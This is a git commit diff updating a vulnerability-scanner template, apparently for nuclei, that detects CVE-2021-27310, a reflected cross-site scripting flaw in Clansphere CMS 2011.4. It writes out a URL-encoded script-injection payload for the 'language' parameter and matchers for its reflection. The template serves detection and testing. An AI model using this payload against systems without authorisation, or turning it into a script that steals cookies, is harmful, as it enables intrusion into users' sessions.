Merge pull request #3255 from projectdiscovery/princechaddha-patch-3

Update and rename CVE-2021-27310.yaml to cves/2021/CVE-2021-27310.yaml
2021-12-03 14:45:46 +05:30 · 2021-12-03 14:45:46 +05:30 · 6c70576223
parent 8d093a86a6 7a32fc3941
commit 6c70576223
1 changed files with 7 additions and 5 deletions
--- a/cves/2021/CVE-2021-27310.yaml
+++ b/cves/2021/CVE-2021-27310.yaml
@ -4,20 +4,22 @@ info:
  name: Clansphere CMS 2011.4 - Reflected Cross-Site Scripting (XSS)
  author: alph4byt3
  severity: medium
-  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27310
-  tags: xss
+  reference:
+    - https://github.com/xoffense/POC/blob/main/Clansphere%202011.4%20%22language%22%20xss.md
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27310
+  tags: xss,cve,cve2021,clansphere

 requests:
  - method: GET
    path:
-      - '{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3CScRiPt%20%3Ealert(9735)%3C/ScRiPt%3E&module=module'
+      - '{{BaseURL}}/clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module'

    matchers-condition: and
    matchers:
      - type: word
-        words:
-          - "<ScRiPt >alert(9735)</ScRiPt>"
        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header